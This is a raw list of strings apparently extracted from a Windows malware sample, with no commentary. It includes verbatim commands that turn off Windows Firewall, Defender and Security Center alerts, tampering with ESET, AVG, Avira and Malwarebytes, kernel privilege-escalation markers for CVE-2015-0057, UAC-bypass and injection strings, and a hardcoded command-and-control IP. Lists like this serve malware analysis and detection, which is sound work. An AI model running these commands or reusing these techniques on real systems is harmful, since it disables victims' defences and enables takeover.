- open
- AppDataDir
- SOFTWARE\ESET\ESET Security\CurrentVersion\Info
- Sorry but i cannot find any installed ESET product :(
- \updfiles
- \lastupd.ver
- \upd.ver
- cmd.exe /c rmdir /S /Q "%s"
- cmd.exe /c md "%s"
- cmd.exe /c attrib +R +S +H /D /S "%s"
- cmd.exe /c md "%s"
- cmd.exe /c attrib +R +S +H /D /S "%s"
- cmd.exe /c md "%s"
- cmd.exe /c attrib +R +S +H /D /S "%s"
- Local AppData
- SYSTEM\CurrentControlSet\services\Avg\SystemValues
- Sorry but i cannot find any installed AVG product :(
- \Avg2015\
- \Avg2014\
- \Avg2013\
- \Avg2012\
- \Avg2011\
- update
- cmd.exe /c rmdir /S /Q "%s"
- \download
- AppDataDirectory
- SOFTWARE\Avira\Antivir Desktop
- Sorry but i cannot find any installed Avira product :(
- Path
- SOFTWARE\Avira\Antivir Desktop
- Sorry but i cannot find any installed Avira product :(
- \TEMP\avwin.ini
- avconfig.exe" /SAVEAVWININI="avwin.ini;"
- ALLUSERSPROFILE
- \Malwarebytes\Malwarebytes Anti-Malware\
- ProgramData
- \Malwarebytes\Malwarebytes Anti-Malware\
- exclusions.dat
- Configuration\settings.conf
- Configuration\scheduler.conf
- exclusions.dat
- Configuration\settings.conf
- Configuration\scheduler.conf
- ProductPath
- SYSTEM\CurrentControlSet\services\MBAMProtector\Parameters
- C:\Program Files\Malwarebytes Anti-Malware
- \mbam.dll
- ProtectionStop
- SchedulerStop
- SelfProtectionDisable
- mbam.exe
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v EnableFirewall /t reg_dword /d 0 /f
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v EnableFirewall /t reg_dword /d 0 /f
- net stop MpsSvc
- net stop WinDefend
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f
- kernel32
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f
- IsWow64Process
- GetSystemWow64DirectoryA
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v DisableNotifications /t reg_dword /d 1 /f
- kernel32
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v DisableNotifications /t reg_dword /d 1 /f
- GetNativeSystemInfo
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v EnableFirewall /t reg_dword /d 0 /f
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v DoNotAllowExceptions /t reg_dword /d 0 /f
- kereruthjertr456
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v DisableNotifications /t reg_dword /d 1 /f
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- mbam.exe
- reg add HKLM\system\currentcontrolset\Services\SharedAccess /v Start /t reg_dword /d 4 /f
- WinNtM
- reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t reg_dword /d 1 /f
- reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusOverride /t reg_dword /d 1 /f
- WinNtM
- ekrn.exe
- reg add HKLM\SOFTWARE\Microsoft\Security Center /v FirewallDisableNotify /t reg_dword /d 1 /f
- reg add HKLM\SOFTWARE\Microsoft\Security Center /v FirewallOverride /t reg_dword /d 1 /f
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- WinNtE
- reg add HKLM\SOFTWARE\Microsoft\Security Center /v UpdatesDisableNotify /t reg_dword /d 1 /f
- kernel32.dll
- WinNtE
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- avgui.exe
- WinNtAv
- WinNtAv
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- avgnt.exe
- WinNtAr
- WinNtAr
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- kereruthjertr456
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- kereruthjertr456
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- pwned!
- not pwnd!
- SecureZonesTestUpgrade
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- SecureZonesTestUpgrade
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- HalDispatchTable
- ntdll.dll
- NtQueryIntervalProfile
- NtAllocateVirtualMemory
- NtQuerySystemInformation
- NtFreeVirtualMemory
- HalDispatchTable
- PsInitialSystemProcess
- PsReferencePrimaryToken
- PsLookupProcessByProcessId
- HalDispatchTable
- $$$Secure UAP
- \setup.exe
- runas
- /C "copy "
- " "
- " /Y && "
- " "
- cmd.exe
- SOFTWARE\Microsoft\Updates\Windows XP\SP0
- SOFTWARE\Microsoft\Updates\Windows XP\SP10
- SOFTWARE\Microsoft\Updates\Windows XP\SP3
- SOFTWARE\Microsoft\Updates\Windows XP\SP4
- #32770
- SeDebugPrivilege
- SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
- .exe
- :Zone.Identifier
- FILE1
- RunYourMalwareHere
- RunYourMalwareHereWithHighIntegrityLevel
- GetNativeSystemInfo
- kernel32.dll
- KB2850851
- KB2850851
- GetNativeSystemInfo
- kernel32.dll
- GetNativeSystemInfo
- kernel32.dll
- error running file x64
- svchost.exe
- FAILED get win version
- Failed NtQuerySystemInformation
- Failed small_buffer
- Failed NtQuerySystemInformation2
- exe
- ntdll.dll
- Failed hntdll
- ZwQuerySystemInformation
- Failed pZwQuerySystemInformation
- ZwAllocateVirtualMemory
- Failed pZwAllocateVirtualMemory
- Failed sub_40101A
- PsLookupProcessByProcessId
- user32.dll
- AnimateWindow
- CreateSystemThreads
- Failed FindAnimateWindow_Call
- Failed pZwAllocateVirtualMemory
- Failed pZwAllocateVirtualMemory2
- gwgOTIwghththueryjret
- user32.dll
- GetNativeSystemInfo
- kernel32.dll
- checkarea
- checkarea
- checkarea
- checkarea
- ntdll.dll
- NtQuerySystemInformation
- PsLookupProcessByProcessId
- PsReferencePrimaryToken
- HalDispatchTable
- ntdll.dll
- NtQueryIntervalProfile
- STATIC
- MainWClass
- MainWClass
- STATIC
- SCROLLBAR
- testbox
- testbox
- testbox
- testbox1
- testbox2
- testbox3
- testbox1
- testbox2
- testbox3
- testbox1
- testbox2
- testbox3
- cItems
- cItems
- 3036220
- not admin. trying to exploit...
- success exploited CVE_2015_0057!
- 3036220
- not admin. trying to exploit...
- success exploited!
- medium or low IL, trying to elevate to SYSTEM
- find and replace path
- explorer.exe
- FlattenPath
- gdi32.dll
- SetWindowLongA
- user32.dll
- CreateWindowExA
- user32.dll
- StrStrIA
- shlwapi.dll
- strlen
- ntdll.dll
- DeleteDC
- gdi32.dll
- CreateCompatibleDC
- gdi32.dll
- not admin
- not admin
- admin
- do Inject
- IL > 0
- TULS11
- 93.185.4.90
- GET
- Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 OPR/28.0.1750.48
- LdrLoadDll
- LdrUnloadDll
- LdrEnumerateLoadedModules
- RtlInitUnicodeString
- RtlEqualUnicodeString
- RtlAddVectoredExceptionHandler
- RtlRemoveVectoredExceptionHandler
- RtlPushFrame
- RtlPopFrame
- RtlGetFrame
- ZwProtectVirtualMemory
- ZwUnmapViewOfSection
- ZwSetContextThread
- wcsrchr
- wcscmp
- memset
- memcpy
- VirtualFree
- ZwMapViewOfSection
- kernel32
- wmploc.dll